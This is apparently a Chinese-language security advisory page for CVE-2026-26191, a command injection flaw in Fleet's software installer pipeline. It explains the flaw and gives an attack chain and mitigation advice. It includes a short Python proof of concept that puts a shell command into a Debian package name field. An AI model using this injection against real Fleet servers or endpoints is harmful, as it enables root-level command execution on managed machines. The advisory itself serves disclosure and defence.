CVE-2026-26191 CVSS 9.8 严重

CVE-2026-26191 Fleet远程代码执行漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-26191

漏洞类型

命令注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Fleet

漏洞概述

Fleet是开源设备管理软件。在4.81.0版本之前，其软件安装程序管道存在漏洞，允许通过特制软件包在触发卸载时以root或SYSTEM权限执行任意命令。该漏洞源于上传软件包时提取的元数据未被正确清理，导致生成的卸载脚本包含恶意代码。

技术细节

该漏洞的核心在于Fleet处理软件包元数据的机制。当上传.pkg、.deb、.rpm等格式的软件包时，系统会提取元数据（如包名、版本）以生成卸载脚本。由于受影响版本未对元数据进行严格的输入验证和清理，攻击者可以在这些字段中注入Shell特殊字符。一旦管理员部署该软件包，生成的脚本便会被分发到受管端点。当卸载流程被触发时，脚本将以最高权限运行，解析并执行注入的恶意命令。

攻击链分析

STEP 1

1. 构造恶意软件包

攻击者创建一个包含恶意元数据（如带有命令注入载荷的包名）的软件包（.deb, .pkg等）。

STEP 2

2. 上传至Fleet服务器

攻击者将恶意软件包上传到Fleet管理平台，或者诱导管理员上传。

STEP 3

3. 生成恶意卸载脚本

Fleet服务器解析软件包，由于未过滤元数据，将恶意内容写入自动生成的卸载脚本中。

STEP 4

4. 分发与执行

该卸载脚本被分发到受管端点。当卸载操作被触发时，脚本以Root或SYSTEM权限运行，执行攻击者的命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3 # PoC for CVE-2026-26191: Crafting a malicious .deb package metadata import os # Simulating the creation of a malicious control file for a Debian package # The 'Package' field is injected with a command separator and a payload malicious_package_name = "pwned.pkg; touch /tmp/CVE-2026-26191; #" control_file_content = f"""Package: {malicious_package_name} Version: 1.0 Section: base Priority: optional Architecture: amd64 Maintainer: Attacker <[email protected]> Description: Malicious package This package demonstrates the command injection vulnerability. """ # Write the control file with open('DEBIAN/control', 'w') as f: f.write(control_file_content) print(f"[+] Generated malicious control file with payload: {malicious_package_name}") print("[+] When Fleet processes this package, the uninstall script may include 'touch /tmp/CVE-2026-26191'")

影响范围

Fleet < 4.81.0

防御指南

临时缓解措施

如果无法立即升级，管理员应避免上传来自不受信任或未验证来源的软件包。此外，可以在部署前手动检查并编辑自动生成的卸载脚本，剔除可疑的命令注入内容。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表